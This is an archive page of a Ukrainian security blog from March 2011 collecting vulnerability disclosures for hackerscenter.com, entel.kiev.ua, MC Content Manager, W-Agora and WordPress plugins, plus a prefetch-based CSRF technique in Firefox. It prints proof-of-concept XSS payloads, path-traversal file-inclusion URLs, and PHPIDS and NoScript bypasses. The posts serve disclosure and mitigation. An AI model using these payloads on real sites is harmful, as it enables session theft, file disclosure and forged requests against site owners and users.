Архів для категорії 'Уразливості'

Уразливості на www.hackerscenter.com

15:02 23.03.2011

20.09.2010

Ще в березні, 13.03.2008, я знайшов Insufficient Anti-automation, Abuse of Functionality та Cross-Site Scripting уразливості на хакерському сайті http://www.hackerscenter.com. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні Insufficient Anti-automation та Abuse of Functionality уразливості я писав в статті Розсилка спаму через сайти та створення спам-ботнетів.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.03.2011

Insufficient Anti-automation:

http://www.hackerscenter.com/index.php?
/component/option,com_mailto/link,1/tmpl,component/

На даній сторінці немає захисту від автоматизованих запитів (капчі). В системі використовується таймаут для захисту, але це легко обходиться.

Abuse of Functionality:

Можлива розсилка спаму на довільні емайли (можна підмінити всі важливі поля, а також можна підмінити URL).

XSS (при обході PHPIDS):

POST запит на сторінці http://www.hackerscenter.com/index.php?
/component/option,com_mailto/link,1/tmpl,component/
" style="xss:expression(alert(document.cookie))В полях: E-mail to, Sender, Your E-mail, Subject.

Дані уразливості досі не виправлені.

Добірка уразливостей

19:08 22.03.2011

В даній добірці уразливості в веб додатках:

  • Hewlett-Packard OpenView NNM webappmon.exe execvp_nc Remote Code Execution Vulnerability (деталі)
  • HP OpenView Network Node Manager “ov.dll” Buffer Overflow Vulnerability (деталі)
  • Stored XSS vulnerability in Webmedia Explorer (деталі)
  • XSS vulnerability in Kandidat CMS (деталі)
  • HP OpenView Network Node Manager “nnmrptconfig.exe” Buffer Overflow (деталі)
  • HP OpenView Network Node Manager (OV NNM) Running on Windows, Remote Execution of Arbitrary Code (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in Kandidat CMS (деталі)
  • XSS vulnerability in Kandidat CMS (деталі)
  • XSS vulnerability in MemHT Portal (деталі)

XSS, AoF та IAA уразливості в MC Content Manager

15:18 22.03.2011

24.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на сайті br-ua.com та інших сайтах на даному движку. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MC Content Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.03.2011

XSS:

Уразливості на сторінках реєстрації та відновлення паролю.

MC Content Manager XSS.html

MC Content Manager XSS2.html

MC Content Manager XSS3.html

Abuse of Functionality:

http://site/users/register

http://site/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Insufficient Anti-automation:

http://site/users/register

http://site/users/remind

Хоча капчі використовуються на даних сторінках, але для визначення емайлів (логінів) користувачів не потрібно вводити коректну капчу.

Уразливі потенційно всі версії MC Content Manager (MC Content Manager v.10.1.1 та попередні версії).

Уразливості в плагінах для WordPress №39

23:55 21.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах GRAND Flash Album Gallery, Cool Video Gallery та Inline Gallery. Для котрих з’явилися експлоіти. GRAND Flash Album Gallery - це плагін для створення фото галерей, Cool Video Gallery - це плагін для створення відео галерей, Inline Gallery - це ще один плагін для створення фото галерей.

  • SQL Injection in GRAND Flash Album Gallery wordpress plugin (деталі)
  • Path disclosure in Cool Video Gallery wordpress plugin (деталі)
  • XSS in Inline Gallery wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на www.entel.kiev.ua

15:03 21.03.2011

03.09.2010

У квітні, 14.04.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.entel.kiev.ua (це українська секюріті компанія). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.03.2011

XSS:

Insufficient Anti-automation:

http://www.entel.kiev.ua/ru/index.php?r=43

http://www.entel.kiev.ua/ru/getpassw.php

В даних формах немає захисту від автоматизованих запитів (капчі).

Дані уразливості, як і багато інших, досі не виправлені.

Вбудований CSRF в Mozilla та Firefox

23:51 19.03.2011

Ще 06.02.2008 я виявив CSRF уразливість в Mozilla та Firefox. Дану атаку я назвав Prefetching CSRF, тому що CSRF-атака відбувається через функцію префетчінгу. Це вбудована CSRF уразливість, бо використовується вбудований функціонал браузера.

Функцію префетчінга я використовував ще з березня 2003, як почав користуватися Мозілою, але лише в лютому 2008 року я звернув увагу на можливість використання функції префетчінга для проведення CSRF атак (і з тих пір більше її не використовую).

По замовчуванню в Мозілі та Феєрфоксі опція префетчінга увімкнена. Що дозволяє проводити дану атаку на всіх користувачів Mozilla, Firefox та інших браузерів на движку Gecko.

Атаку можна провести через теги link або meta, або через HTTP заголовок Link, в яких задається relation тип next або prefetch.

Через теги:

<link rel=”prefetch” href=”http://site/script_to_attack”>

<meta http-equiv=”Link” content=”<http://site/script_to_attack>; rel=prefetch”>

Через HTTP заголовок:

Link: <http://site/script_to_attack>; rel=prefetch

Для атаки потрібно розмістити необхідні html-теги на сайті (або додати необхідний заголовок до скрипта), що може бути зроблено через відповідні уразливості, або додано нападником на власному сайті. Після чого потрібно заманити жертву на відповідну сторінку.

Дана методика CSRF-атак стане в нагоді, коли інші методи недоступні. Зокрема коли користувач браузера відключить зображення, скрипти, плагіни, frame/iframe та css, тобто всі можливі варіанти (на його думку) для проведення CSRF-атак, все рівно можна буде провести CSRF-атаку через функцію префетчінга.

До того ж даний метод може бути використаний для обходу систем захисту від CSRF. Зокрема розширення NoScript від Firefox, яке з 2007 року також має вбудований захист від CSRF-атак. Використовуючи функцію префетчінга NoScript легко обходиться.

При цьому завдяки можливості використовувати заголовки сервера для префетчінга можна проводити приховані атаки. Тому що інструкція браузеру зробити CSRF-атаку буде знаходитися не в тілі веб сторінки, а в HTTP заголовку, тому звичайний користувач не зможе легко виявити подібну атаку (джерело і напрям атаки). Так само як не зможуть її виявити і секюріті програми, що аналізують лише код веб сторінок.

Для захисту від даної атаки потрібно відключити префетчінг в браузері. В старій Mozilla це можна було зробити через меню (в опціях), але в Firefox ще з самих перших версій дану можливість з меню (з опцій) прибрали. Тому потрібно задати налаштування просунутим методом (який працює в усіх браузерах на движку Gecko). Щоб відключити цей функціонал, в about:config в network.prefetch-next вкажіть false.

Атака працює лише в Mozilla та Firefox (та інших браузерах на движку Gecko, що має функцію префетчінга). В браузерах Internet Explorer, Opera та Chrome це не працює. Вразливі всі версії Mozilla та Mozilla Firefox (в тому числі Firefox 3.x та бета версії 4.0).

Добірка уразливостей

15:05 19.03.2011

В даній добірці уразливості в веб додатках:

LFI, IAA, XSS та FPD уразливості в W-Agora

15:20 18.03.2011

20.01.2011

У жовтні, 31.10.2010, я знайшов Local File Inclusion, Insufficient Anti-automation, Cross-Site Scripting та Full path disclosure уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на різних сайтах, що використовують дану систему. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

18.03.2011

Local File Inclusion:

http://site/register.php?bn=1 (в папці conf)

http://site/register.php?bn=..\1 (в будь-які папці - тільки на Windows-серверах)

Local File Inclusion:

Дана уразливість працює в 4.0, але атака в Windows не працює в 4.2.1.

http://site/rss.php3?site=1 (в папці conf)

http://site/rss.php3?site=\..\1 (в будь-які папці - тільки на Windows-серверах)

Insufficient Anti-automation:

http://site/register.php?site=support

В формі немає захисту від автоматизованих запитів (капчі).

XSS:

http://site/register.php?bn=%3Cbody%20onload=alert(document.cookie)%3E

XSS:

Дана уразливість працює в 4.0, але не працює в 4.2.1.

http://site/rss.php3?site=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/rss.php?bn=1

Уразливі W-Agora 4.2.1 та попередні версії.

Уразливості в плагінах для WordPress №38

23:51 17.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах PhotoSmash Galleries та 1 Flash Gallery. Для котрих з’явилися експлоіти. PhotoSmash Galleries - це плагін для стоворення фото галерей, 1 Flash Gallery - це ще один плагін для стоворення фото галерей.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Нові уразливості в W-Agora

15:03 16.03.2011

15.01.2011

У жовтні, 27.10.2010, я знайшов Cross-Site Scripting, Local File Inclusion та Brute Force уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.03.2011

XSS:

http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/

Local File Inclusion:

В папці conf:

http://site/current/getfile.php/1

http://site/current/index.php?bn=1

http://site/current/list.php?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/current/getfile.php/..\1

http://site/current/index.php?bn=..\1

http://site/current/list.php?bn=..\1

Brute Force:

http://site/current/login.php

Уразливі W-Agora 4.2.1 та попередні версії.